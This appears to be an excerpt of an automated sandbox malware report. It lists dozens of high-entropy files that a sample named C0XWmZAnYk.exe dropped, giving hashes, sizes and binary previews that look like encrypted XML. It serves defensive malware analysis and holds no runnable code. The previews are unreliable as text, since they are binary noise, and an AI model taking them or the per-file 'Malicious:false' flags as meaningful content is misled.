              SSDEEP:24:wTbvE8aMCpNsMOoczyllgui7thFUGh6vsDHW6MGd+bD:w/SMpKxiphFUGhFM48D
              MD5:1C4CEDDAF072C4C0A3BC8CAEE30593EA
              SHA1:BDFB6C4CF51348BD1B761B51EC45928D4798BC28
              SHA-256:84C59FA397C9ADA2A251DEC25324BCEB82E62F685EE14F2A7AA9A0D445626273
              SHA-512:99ACA2C2D0ECAA0F2F277D7FC05A57B90220C3456B1EC9011D3E43E1CAE8D12FAA13685993BB913FCCEE51003C5546C559C9D26F4CC8AD94EC2777F0F5EDFB53
              Malicious:false
              Preview:<?xmlMw.?....ZvUo..6N...o.C..V.A*Pq*M.3.36.1..4.\...lmE1Y...%OH%$..%.Z?...~."..<.K.M.i.....G.w......mn.4..4I..3U.:..a]..S....5........C[qrB....Z.H...>.&.../^-L...U'..O+..I.Wb....C..`...<j.J.K.S.w.r4...o's...M...I.73.?.......u=.....n..X...."A+.....FN..Fxb.`..]....>j...$...:....Y.<h.>'...)..-.......W@.S.0...]{.c$.J.|..C.y:..,.Ku.......0..........y.m..-1..m..\..=[.p..)..%...l+...'_...>....VSx.{.M@..'r..*2.>6.....7....h.P.RJ...k.RF...i.@........(..S7i..yJ.*..\...m.C......S.?y&T%.-.}.../..v..Typ.=).N...(..ox.jq._...bi.L8.....EY..H..[ ..v.........:. ...0........{H...2..Lv_.p.&.RL.`^@...f..W..#q>9.o.q.'......Z...3......Qq..](}...4.4&X....W..Z...b.....~..-.A.....*....Z....A#.O.."..G.6..j..w.P7.X>...[........._..y.4...PP.?.....>...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):886
              Entropy (8bit):7.764478172457243
              Encrypted:false
              SSDEEP:24:dFLM+oxuK1gGk22LQ5sx4gSZ0qyYpjU7dLd+bD:dgxuKZklQyugSZQ97dR8D
              MD5:17F693AA97260D667E91EDBA044C5EF9
              SHA1:E19A7F018B99BC26ECDB7BE5FA53B83686C14614
              SHA-256:C8BC8683F13976CE220F758B74A08A9C2604F4C9694ECDBDFAAF5AA3449D9122
              SHA-512:284336A2852596B3E53BD2122A1D4CAA7584C0A8D9C27C7636ADEB876438AC10024F76C71F63675A2F3C52E9A234B5B293B3C14456C08C9EC0379E663707FEA4
              Malicious:false
              Preview:<?xml..\..98.8....}...5...i.9t.RnZ..-!9.i..N..:.1<t...U...'..Y.....%.v...|.n.5....r.`D..4...P.....,A.(e.&.%...#u *@...e....51W..'...J....N.A..[IW#....".{.\.Y4..A.d.y.m....?Q.,X+.@....f.)D....U\.S.Wi..64%.....Y..E/..Do>.O..:S......|B........`..M..#.m...Dy<Y7.s..J.'.......^3~}Xl.]=b'k....cx.2.A....F.I...Tb...XI..R@.nnH."V..R+.........q..)....)=M...I..)....G......Z.5=l.i...k>Y.GZ..`.0.28`4]1V2..&I........Y.f.:.o.....j..Q.r.(F.............ET...~T.....jp.;..`L.\x..Nz..-.0.6.G.Z....D._S8.u..#......4.l...i...t...*G...W.X....4.[S..h.#.....Q.D'u....FI......j.W.^."t...t....s.xx(..n...0y''...`...T03$.......TH._.Je.ZK..h$%B..Y.h..u...p.yg[&.......H....p.@d/A.w.dy...<..Up..@.}wMiT.67.p.2P..p..Y}.....T.M`.L......t..z....,....m..[,...`.D.0...b.d..Q./........O....R.9q.,PrgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1003
              Entropy (8bit):7.787886306010412
              Encrypted:false
              SSDEEP:24:/ZsKA8miETe1f6FxW6FiF7v+EASwZZxvd+bD:Bsedd6X1FipWEUxl8D
              MD5:998C485410157DFA35613C2EE4BA61DD
              SHA1:50A2A5E7D66C68144124F1A2FF07FB19349B3101
              SHA-256:ED6CC2E2A53CAEA4964C3BEC5C7F4DD1202C62273AD7AF77514A8CC5E4CC245B
              SHA-512:7E697245622BF82CEA37FBEF3F721D4E9DAF6851F36C125348E5C22DA73E3CE2062D54171F5AD92AB140DAB5E6858302AFC4A943A26689203A4036F0E283F5EC
              Malicious:false
              Preview:<?xml..3...^.cMW.K.....$F.Fb..1...c0..0Y....-F..i8`..q..\0...R.....'......9z7..{...y.0>.Km...2.)....cSXx6].X{.n..mb.v....Z?...`...7..xo......=.........6_v0:Es....bn...c...<.:W........ ...c.....!.w\.L.7..q.R!..w......%.|.m."..K....o.....R..".........g...]2f......@......1..D?DOX.0.... .(]..H9.].@..<.....J3..j.nn....i.Ur.J`.Y]..JL._.V..s}...2........[8.;"v.,..{...jF}`}....G....9q<2==......Ep.....'..MLd.o....e....C..'us....>J.GQJt.g.^4.o.b.p...t..a...Mi...@...Mh...$...qK....lF..Z)....../....i..j......3.2C.+...O..,r..^.G...?...M......q..I.~.w.F..\5..?'D..h....7.A..%-..?..........~9........V.Gj..l.....e..v....2...7....t.32NF.....-'.T..[.?|...I2...&.$.`*...(..Y..d.".....K,h8&[.)V.W...'.Z........J$.~....y.x;...?.<J.......J).1.....8...,.7Iy.....a.O..]..#.9...7uS.k;...C*Cb[........."hL]v.;>...t.%.....toC#.!....4R.faZi.,..g.:.q....V"..\.X.Y5..a..E{.c.....u...t~.dp...........<..`.8P....tgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4D
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):726
              Entropy (8bit):7.702957055979158
              Encrypted:false
              SSDEEP:12:92MN8fWDQna4IuCsbNmnPIXHxq0/8aH2Sma2asB4h4PGYiMi3tkiqkoNdxa3ciik:92MMLn3MYoa0G7j3spOYiNtkm2d+bD
              MD5:863CE00EBA14A1027C89868C432DC846
              SHA1:3D8362D26A173F24CBB19B46DC7AED9B43091DD6
              SHA-256:BBCD0FA13D22B20909CE218AE687BFEBF6B3291F2F263568BC8FF522B420BA3B
              SHA-512:30AEF0A5CB5E99001C6844CDCC6452FCBD4ECD2C06A036349F57145AAB42E2EF9CC79D70A99A5848F17FDC2BE45483C5C106CD7E070FA6119FC47BBAD9B4FB8D
              Malicious:false
              Preview:<?xml4....yKh.+M.G.7e.ms...VD..\*.jA.M'.(.).R...X.._.......$r&.s.Q....y..?r.z.n.up.l.s.T....`..\.S.8:.?..I.wt...B.17.B.....W[.Dv.Ub..N$J..|E..gh...b....`.h.<.......".....[ad$.Y...2.....u.k.....'...Q7R.S..1f..m.{...Hw7Y*..5n..~#}h*.v...F.....,i..blO6._...U..V....t.A.\...R[N@-9;&.d.V. .....Z2.9K.&....0`......]&4......r.0..A......}........Y ..d.h....")..B,b..N.0w...3*deEt.@7..mI...B.M..Z.X.3u.e...^...9N?}.2t...WS.yT|.....= ....`$^..y.:U7...A......=..z..}[..ul..>.=E.]......{S...T...$.4.I.eM.%O..+.A....v...L.jy.W..;.1.\.|.B.,.{.M\"....C......P....I...}1R....7.hnB.f.Z+.C.6.../..3C ...fY....\..Z...u.....m.*].R.l.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):931
              Entropy (8bit):7.7730383613438185
              Encrypted:false
              SSDEEP:24:N8wz+4n4VazuQ9z6/Zr59oFRCGk5KgboFqSzcKQfjd+bD:Nxzb56H9oFRe5KgbZKQh8D
              MD5:B3D41520C7D6C82F2E30C2E4AFA1B085
              SHA1:55D8293CF13C7B2F81470021695265EDC1380453
              SHA-256:D282489C1552376EF31E9953AE7B6E3DCD49755833285C73E13D4491199CCF85
              SHA-512:7868A8C103C5D6D43A1ACD1FB4AEB44F6B3F9CC28682D0DB4F13F1C0C45E5CE0CE315D7301A90F68E07A8801C9A0C1BB28DF63389C42C7442A5B0387F0DF731B
              Malicious:false
              Preview:<?xml$....]..c...u..:.1..V..T..l.Y.F....Br..{v..P9....!...".?...##......o3..!.v..$GS k.......I..'$...S&y..-...0}.. ....A.z....<z+[..%.l.......O..R.1..m6iVq....?.^..1.~.....r.........q_..P0.;.p..GZ...r..&)."7,...-V.y..XT.EY.A$.N...L...C..\..p...Z7).p....*..;.....X.D.UTg.[..F.k.@L../........J...kKRW...kM3....X.>`\..H.a..=..X...I..K...3.k.C..*..5....M.6,.........Q...X........m.z..G...&}..+;I..n...t......c...!.W:;[.~0sG.u..H.c.5..../{.[o....TA|{^f.N-./...O@....4.....n....%...'.5..^8.o.X"#).E....2..-.w;.}H...IF).g.K..U."....Ao.V.Io.^.WO.c.I..M..:.'..C{.1...U.-B5C.v...8.$......,.|".....Q..W.y....QJ.j.{+`....@d......E.....n.W;.Jm4{.(.....P.&X".w.&..S..F I..8h...w^..i..)9B;'..%...6.f7...&...c.{....X......~....!......!n..C.]u...>..L...h._...W....t.....qi....$..c+j....:....mg*..,..C..$.ry.9":.X.|.-......?..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):923
              Entropy (8bit):7.763969672250935
              Encrypted:false
              SSDEEP:24:GQcCpVflXVsi+twLTBHFBx2O4e3sK/oDWxufepNRkCyd+bD:9pFlFsipL9nx2QsKQDWxuf6RkF8D
              MD5:6C772637EC4D513A8F014063BE3B20CF
              SHA1:C4622A8119BD0F6BB9B0A2D30FBF72521E0A699F
              SHA-256:4D27957803F9EC04B320C0B7DE5FB227771EE106E9BDC5DF4478540B51A01588
              SHA-512:3067F8F73D35A93AA4D0E5F1B67B921061FD43BEF6E4A2834F0DC27239BF64A5CD236215FA72AABB4EBDD66416806625FB9749874AE821E2DA65288959C67658
              Malicious:false
              Preview:<?xml.f.;.<.j]...`[N.3...h.veD[9...[..;......Ob..... ...1...ez:...(...i.2.=.;..{....Q.b.:x.].o.r...V..K.>.w...W.o....t;3...-..H.0k.{...>...36...EW.~.$=8.uI70.|.=......K..C.Pbb..c........3.f...Z...o..!.)..j.,.chD..h.~...x.._a.'f.;..2....,...X. ....W..q.o.<...`......F@OAx..v....ex...2E]..v.3w...R.?....lx..\.[..0,.z.O......`.'.c.D72.9..#H.....1......g..`....dQ..../..<d..h.+..&?.r.(G=m...W.T..Z..i...TH.........o.T.s..=.CwGV!.G..F.fT.......(.V.....@.k..3r.K.,<6/...>..-..5J(..<.C/....\M.f.S..G.....g.w..uE.FE...`v.......B.....#.`/......T.q!..ZN..=5V..7....A..7.w...L..@...FT7.S...K.&C.Q.[.,~.}.o...m}.....%.uw.,h....;.......|.X^[.*,......0Z.#...kg..D.Q}.Lg12...@s;.!...yP...-.!'.L.L.B.R.\...F.....6&.R.Z.. H..?xxk.)....e^.i(m....e.......G......4........Q...E.P...on.^.....dh_...K1,F.Yb.;166.o..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1267
              Entropy (8bit):7.827483325298541
              Encrypted:false
              SSDEEP:24:Ricpdl9puv8Wf2JHRGa+4ysO0V5qD2SswObQsPJw4+Zenlsr3w0d+bD:RTTqkxGqOPVswO0sRwTEsrJ8D
              MD5:ACB98B2A8EE5A9FA5C89A1D55340070F
              SHA1:6148EB3B8886182B9911BEB482B8C94AD7B1DF81
              SHA-256:ABA1E82641B721FA707D29E5AFDA6C70EAB4D40E331EBD79D0188624D4C14FD2
              SHA-512:D58846B5E8D5D080D8FF08542274E9F9E6499BB4B8DE013F3AF976D455E6A00305EF604CB743FC4A43BD66B95282F717669F5E4DA064E06D1CAB1BE4D2F514C2
              Malicious:false
              Preview:<?xmlPQ.c..r..dK..e...+..v.H4..SK............D......h.Jq..UO...[$...7H.}...j4xT>..m~.J....~7J.....W.~=..x..<9)N.m3:...........GmuP....r.M...$...u...n..e..C.Q........P.o;...k..H5....:#.u.....Q......9.../..s~..H.m.>.....a<.|.t...u..m.y.}.$..Z...W..........H0s.....l91.."..3.C..h{5.-.C^....=../X.c....`M.Yd.LE...Hh.-..(~..M..~M....KN9>..Z..v.k.>..ZGr.MP...PGH...y.02\..Z.-..z+....`-.c..g....f#.A.T}4.,..p...(:7..[B1......f.."W....MS.....S...R....S.JN......tJ..("/tee.......N|...|R.Q.*....m}h.e.\..}..Q..9.LL... .xa.^x....._..V$VT..b$.r....8..p..c.|.<.B..GP..I...Mv......d.....]...L..T.a'|y.h.tbbjx..7.....@..W.Oc.!1...Y...:..B....;ReZA.......;R.<F*........i.\..Z.f.....P...`.v..00V9...ll...xK...&..2..`k.9I>.`..q.)...7..n.l/xN.Ae..%xS.8S../.d..YW9y....JX+...Zv+........$.9& ..Of."..u.M[x.....9.r........2......qyu.+.1g.e..[:K.h......mQ....3....d.#...0..Z.....s.....D..Y9t.zR.E.0j.o.|)..7..U\.3.....L.A.8n..`j....b-.S....aY..f....h.).k..V....eM.,/j..-u+.t
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.694820461413538
              Encrypted:false
              SSDEEP:12:Uql67jdhGIlB0Y8uJ32KxQsDMpASpdFb4G00Me7xOdm5CgegRxfLrQAnz3cNNqZR:Uql0hGyuY72K23KUb4G0Pe7xyNgekfLh
              MD5:846F20C5D8AE5505BFB3EFCD5C8847EF
              SHA1:1956BBB3B59602480B14AB309FC4A11AA6CB6352
              SHA-256:A282FD30C49CD4C0ED575FC540AE12CF8434508DE62DB248A2F4C37A9DAF7AC0
              SHA-512:3D213CAEE4DB32AA7DA0761DA62A8DB9ADCEBC17FFCE80D36FB408D33032CE2E15364438ECFB9521EF6F54881FFB83473C6A60C17C17B05D99B30F9F61593368
              Malicious:false
              Preview:<?xml.y......!,..&D..........H....[.O...9J..-8.&*.O.?..s.b.....T .a.k.O........>q...t..r.i.A......7...Y .O...A..fy.~....'.z.c6.K...'p.-.f.z&28.R2...hH...X..)..R.......\x.1|X&.......`....pV.C.jGv........I.......`.N..."q..a."h.S.E.G..r G..C.X|.P..v...bs..r......2...0@.g.e..O...c`u.*.H.C~....P#>.R+.6..Y<....R.P..'o.='...lco.........0...Q..!.......7.$.r.H.E5.G...v8....:.8<..R....*...<[...j..4.t..q.A...&..[......j....u....x...Q|.....K..h.yit.oR6..F$...8.tX..j..1V...*..h../H.6.......j.....?;.@yP.eB;X5...T. .S1#D....j,<b..D.2......].x9...1.n.......q.2...`.G.......n1.`.b.c..1.........A.O2.x.=pk.. ........gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):723
              Entropy (8bit):7.678708187029349
              Encrypted:false
              SSDEEP:12:4MH2CnLUk8JWCASeEdBiy59xdRHsECX+XF0nDS1dRt2/JJVHFzevuua1RFdxa3cq:469LUk8HldBiI9XRtCX+XSnG1ftOlnuv
              MD5:FC3C49083D6901CF826552D28BFF6C1D
              SHA1:806366445FF50DEF06B446CE48144412E2AF7B75
              SHA-256:F8D5A7CD11A0870819BF1BD6471ADA01DF3D111AA46583E902A45B7E2D8018FB
              SHA-512:53E151B38CC8C75021B8D96A549846DCB40D9BC388E8F76B25344C1E4A1A266C8438CCF0313C04C4F6035CDBC277DBA1CDEA589C2D942881E02C2DF020E7BBF0
              Malicious:false
              Preview:<?xml*.i.[,1.\.#.x~...Y#5 .=V..P.........-.3)&K....(6.....k..\........dG...q..w6....C..wE.[X.{.W.J..|.....Xp...Z.'g...p.u...+.d.Fwt#.j...4.\A!...|...O./.e...6|!....C..z.D-U.jPn..Q...T<...7.0W...\gm.....o.T.[B.R.....1...Qx..K..`..,..<...7.7U.....R.....)O...K..o..qu.!...9....LB..:A.zLs.....m..8..-.X.i.i.w.E...4.....[S.....^...^.1...m.k.f..ZkBW1...g>..8t...,..c...`..e:............q.{6.^?..1."p...W)..<...I.O...c..Hr.F..p.0.O]r...E.-...J.....7.....8.....q.86n.....<....K.;Q?{Be...A.N_.UW.V.]...V.8........."..........g.......;:.].n.:.xIL..[tN..Y.._.J..../....e.......dCr.vU....'......e.X.,.T.0..gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):817
              Entropy (8bit):7.734362132823192
              Encrypted:false
              SSDEEP:24:1XDCyfFvQ6eqZsmYIQZkm+mFF/YsMw/Kd+bD:dGyf+qsb9ZZ+CdMD8D
              MD5:46C83F432CD07BEA8B84A682A24C1054
              SHA1:015A0DFA44974FC56249318AF2057D718BF5B4C8
              SHA-256:F3C93C0E6BF76A7837836DF0ED5F3F9D7F9348A437D0EEF1D4E66C536FCE663C
              SHA-512:D0CA5ACFD55BCA270DC0E5A0EB4DE6D323344297B98629E8AA0B2B6D4EACBB27ABC059D130961790AA0728512A3EFE85D537E7ABE737B863EF6E4A86E7AE8191
              Malicious:false
              Preview:<?xml.-..jvt.,@...V....w......s.......r......t......q.Q......J.M..Z..V.C.7.....E..dG}.VI&...z....~H.....$...s.~,...{=.0.B..(i.5.T;......AA1......=E.=.:._.xP..2..50>._.2.y.am....."O(W...bi..q.....w....n......6..@..g..u..A..........^7J.x@..).RAeb.7.....c.f.Tg*.f.......U3...VZJ.O/.. ..8..Z...]KmpX...\...Q.sl=....I.-.......e.h.B...].I.(..u.$,...jJ........F..)J..[."1f....v......\..G.........3..E.L..,.I..?.`...3..........H.+jl..B..I...?...W.....R..*..}]uf.V.%.F.D`;..P.... ...K..)...P..I....P.+..).9TW..#B......c..;;...~.g.....W....>.2Q....0C....?.$J...w.).g.q..z.O...:._.[,a.....%....D..a.'w*...J.r.....m.M.L..j.=......(/.p0.(....u.c......Uj&.g.*.p.9/......K..IKbt..t.......8.).v.Y..4....x.q..;s...0Q>'c.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):719
              Entropy (8bit):7.6758913556010615
              Encrypted:false
              SSDEEP:12:Z03vSGDCFghQwQN4k7N4ZW0mnHmivj8oJdILGNZNtbEjf6J2z0wwRDFCYy+cydx6:ZeDCWhPQNV4/mRvuLUZwjCJ2zcRDUYTy
              MD5:F3DDA1A63130BAD3A12D6CE54A442BB0
              SHA1:594BB8AB588836D40534731136000894A9E5F8A3
              SHA-256:60A29A85E1B04BA444C5A0F02C590CAF62FB277917BCA5A705C8D5A520A76949
              SHA-512:7AE7B86ED990101F42FDDF432089786FEC9192D35605E810F6890AB31417E3CD23593DD63AF7D4C1FC44FBA0F24DFE12890821A248AB78162770C85AB36FF9F5
              Malicious:false
              Preview:<?xml.C.p....-........y...zQ...Y.].C...i.I..k.7...... t.a.%Y..u...-\a.e{....v.3...":.....$.....x<......u\6...B.?Y.p.-._e!..>....f._@V\...S...8.+.....oht.....5........UE...A.z3..Uu...tGUN.B.+............>...(Zd{..8k..UT..fr..w.......7...'..e/..!.D...9h......{..HA...G.O......,.Y{oC....r.'.nJ.zD.*w...m.n......F..C.=O....@.".Y!,.xN...otT.T.*v.n..u....#..jX7.x..r.E..s<...nf".[.....1vT....)c yT.R.b..f.p..nU.6.....m.:../IG...v......I...b..h.6.=..N..`.A)....].&.(..8z+b..i.:.p..5......W....)6`]l.;F....'..?...5n....8...p......fS....y.5.#.2.JPh.<m..*.n. ....EMF.+z=...a~BG.fd.rc..v3..V........iPm;...P\XC...gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):881
              Entropy (8bit):7.778389427503643
              Encrypted:false
              SSDEEP:24:LevZNuF8hUpjnw6fCyRGc0BKhlxikhqoAcEVd+bD:yZMt9w6fNRuKNcZ8D
              MD5:BB96397989984C07B15FBAD07185D20A
              SHA1:3379EF63A3763A9E6B450BBED9592EE0B0CCC336
              SHA-256:6916B33FAEE1C5AFD84E76337B386365571D8A81F24348DCA64DCAB1DC20A2DA
              SHA-512:910A625A046601FAE26DC7722908F9A1A6064D82EB375377AFFA300A19517907704C678361DDBF66861C92B98D01F30BD60F9CD4494019390E97DB8CB9359C8A
              Malicious:false
              Preview:<?xml.>N.F.m...2.v..y...,z....0.[.}..q?.V..E.n~..&/......K...@,.....n.......r.m...#...D..V.FV.J.wl%u...x36.|..-.........v.N..!3Yw...0.t.y..#...s...:.(...S..v...b)..y...6..b.Q..{R..+.......^\..:(..8..K'f.$.7T.J..Jy.mG.-.2O...Ng..[l $V.......j....O..eu..".z........O........y}.........n..u..f.....?...O..t.#.B.3..oT......4...r..nM.}1./..(5...K..G0?.......|~..V.Q.......].1.p..P....,e.!P...O..Z#BU...w......<.?..S.QC....,.:m.9{....<.u.P.....P.l.`..G:.R...d...,g..rD....Q.j.T9...d..M.+y...y...$"..A....*p..-...'.W..,./A.......#.A.Y..}.Y,a.G..B_d.......%..gV.M.ZZ...{... ...(..L.+.6.._H.....%..>..)#.Sn?._....K.Mg.d..Cf(;......_8.?...@.EQ.k....S..%.d..y.H~.+Yi.z?).......bj/..Y.........h........&.a..3.b..o.y..,..iO...t..M...... .0.0..LU^.0*.C^;..f+..o.gigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):737
              Entropy (8bit):7.688637108558289
              Encrypted:false
              SSDEEP:12:091v9BggOG3Gadx5jHBNBvOFtadcOcc0srN7K89zaXVESZXhrnlJs7Xdxa3cii9a:0Hv9G6GoxxHBNpOCdBch478X/dhrwTd4
              MD5:240887C4A9C146495994D3FBD6D16348
              SHA1:A71D440CFCB186FB08C239FA24FEE2D63B42BCAB
              SHA-256:8DF82927365FBDE42E62E2313DD7C55F14DCBD7CECA437ECFA06604A77CB4EA8
              SHA-512:EB4A4EE07D1653B47AB4C1B9576B4084368DED30105051C062F352DC97C8BA8DAD59DB5EFCBC3F9270BA35303F85312E831628D702CD2AD92802CD31A14CDF24
              Malicious:false
              Preview:<?xmld..,...zA&{!......U.S.........S..7..)...O..Ub...".9N...6.T.@..P.rCxW!43......I=:.;...F...4..OT8.V4.E.s.EL.P7.w..xb...Cm..?.......n...".m..E..~.23.;.F.........}..C..m]....^SU&.3&i.[..[k..B... .....Q..!......-.U . ...V.j.tTD.F-:GK. N.....+...tz.1x.M;Vx..!3q.!..p.>.Y4.j..}..........!].9...i_...C.I|..........s.D..A.a+...:.........0...Ai. V.K..U3.....Z.*.Y>....b..*....[..?.n.<.....(.Y;..e.Q..|.d?..`.9..~+Q..}w.b..UPn...gY.VK#..n-3.^.h]..E.J|....q...'.Z......5.......][Q..w,i......L)...4j.>.>.P.@.."..}...O.S....v..7..=;.E.t.Oj.u._.....I K..^:w..d..`...."A.$-lj.b./j.e..v.G.....nwKP.t<q..L...~...#.Y..%.ck.&.....l"77.NJgigF2ELYocnMQz77LhEpSoXvtYp2junk9HZFtJt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1421
              Entropy (8bit):7.854933035141837
              Encrypted:false
              SSDEEP:24:TTNx9hMZF7aw8Ppnj7fbA+GsjEfReWFOR6gceWJCyBOtVrRLmYZegCSclWxmFzd4:TTNx9ke3V7c+GsO+ACyBwJRRpCT4xmFm
              MD5:A657871D53EF4BBE195E0E03D08849EB
              SHA1:2CE4783D64C07B1CBE9F8100B6F519CC9CEB017F
              SHA-256:CD5F8644DDFAA9F9D519F2A9FBA2C367CE42ED117FE8557A8AFF7F9D63C10EFC
              SHA-512:B8534B04D7DD8B1C53545367B1CE8E200E78568629095E3F437BB0A1AA11A3E5EC584DC20102472F1127143D1A172A9D73E529764BDE79F34EC1477AA9A0EC29
              Malicious:false
              Preview:<?xml..<.i0).1$..B)..q.<..?:.[^.+.`.K..."Y.~...+...q..2../...y......wbdi.06.ZPO......=%.....P.~...]E....U.a#<..&........`.3.f.u1..TA...x.k8............y4-KL.g..]y+4>..."}e...HX2Ar........V...5..mn.....R.z..Ge....d<wS.)..OK..;.vh.......?.h..)c.J.K.#...%.?..L.TP..<.p2.|...E.E...#..2.........Jf....\...0...:.G..EF.j...C{...[7.s4.h[.=....&i.t.....4Q....e..2.S.uf..djh...H...f.......)jk=../d..".......Ek..N.....B.p.........*.;q.C.vbg*.E...C.'.kVQ.3.{...M.y...U..)i........x.WCU..........L..YE+...p.e.+Y.$|E.mT..&%d..2.a../{.V.Ksw.SJ[...6c}.4.\.wWf.w..}.....LK.?..FX.^D*....%.....3...@..Qq...\r.......(..k.$...8../.Os..=.....P/Ti.+.h..k....v...ad.3....?.7..lF;|.S.q8,..X.3q...[.-+./^C..Bi..hG.I....J.............d...iI..;....U'[M$....x~..\.Z0....%.Ug....7.w$ .h..^.n5.mrn-\..r.W.....>` ...Db......./....,.....q.!.d..p%..rJ..%...rI.......6A<.....@.O@.]1Me.....F.[....R..^.N.-y..]...l.y.....B.8..'..49(g..e..d....Z..Y7".9.....H.<.9.^;[%...........ki.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1171
              Entropy (8bit):7.8145320305515185
              Encrypted:false
              SSDEEP:24:nd4oPHRC1bOqFJcXBQv/FINioElGATE0HFIvfi6Iyltd+bD:xHE1bOqFmXBY9ImLx8fi6I6H8D
              MD5:A300227351ADFEE87EF065398BD29FFB
              SHA1:7E101CA4FE5B589EFED187C2123516FCCCE06DD7
              SHA-256:BDC6A5FD00678373D015870A9B2A51410CCB962B01517578AD46E469FBBFF49B
              SHA-512:4321A99E893815AB65147F34EA8AD8DFEA5FDFE9E3031F604D32FD18228870933983D274B5DBBC6212E2B141CFBAC8E71AF53C0EFFC45F5A83BD1B5111FFBDBE
              Malicious:false
              Preview:<?xml....2h.......SZgr.=...i...4......G.........r.6/q.B..L.....i.6....~b.....Dg..f......H.$....k.M.Rg.dfv.F.m.f.Zp.4...%S.8.....g.<J.#.a.,....3.W....@.u>3...lS.......,'........-...o;...Ue.<.6.8.+4.....VkQ..QQ.kS.`.x'{...l^.Ub.s..Q.bo.................>QzEU.eNj..J.?.....J.....8..SDZo.6.I.>.).t.......y:*.J.L].....}.o4....9.^...<.)........sB.....(....^L..",L.E...}6@Y..|V1...k..2.Q!..!..@.|F..1v.....E&....X>..70.....\e..2.!.!.9...T~..u.+.k..l..c.H....!b..>.....Sn.Y..s1.Ea...W2'...o?%u."..r..Z........~......S6......fmXs:..(./.f,.T..#5.....>6...I..O..t+...^.Lh...9..o*.+.....s.B0..%...5.4..0.]./....H[b...<......~.w4.x?..F........*..=.p..S.M<./..P.g-v...p.w.n+;R..S...:F.......m.(.........G.(..oj.......~......H.i..K7z8Df.L..hh.l.)..v.l.l(..W..Bt..$...4."./...i.4h.."..K5..".l.v.G>[.DF.=.%q......v...N...V.B>O.-L.VS...+..Q..p...Cwc.....&c....}.....`-"...KR...S......oW..>o......g.^...2..6.p.3.1...I.y.:=....mH...@!.6}_..mk..K..N.E...H.1.".....5.
              Process:C:\Users\user\Desktop\C0XWmZAnYk.exe
              File Type:data
              Category:dropped
              Size (bytes):1176
              Entropy (8bit):7.811276919701794
              Encrypted:false
              SSDEEP:24:J74CCs0+piLhk+fOTkq6VTUYcKcuBwODtLd+bD:b0+pUq+fOotD9BwwR8D
              MD5:C8AD797EE671DCEB8399F276876703D2
              SHA1:A29F3AF4EAEC1832783DB282BA25CDDD51259FDA
              SHA-256:F5E6A606033534D754307C3B195063DF43EAE36EDA66A513201D5F8B566D69D0
              SHA-512:5AA1DB9FAD197DEFAEDE4907BEC580535F99004578498F2E95FC4F25F620CFE15D226227DA3CF462E7BDA010217B42C3752001FA4335A0CDE9B13256901D1D47
              Malicious:false
              Preview:<?xml.1s;..Nk.w..@1.....V....s..Z5....\..F.0.H.FK..w...y....fY.:."m...Y.\..'-e.d....1Ik>.L..|..e*w.u..;d4.......B"...2I......D....^6|Y.tiz...........\J.D.;?1..9.k+mDh......6t...q........l|.....nt.4e 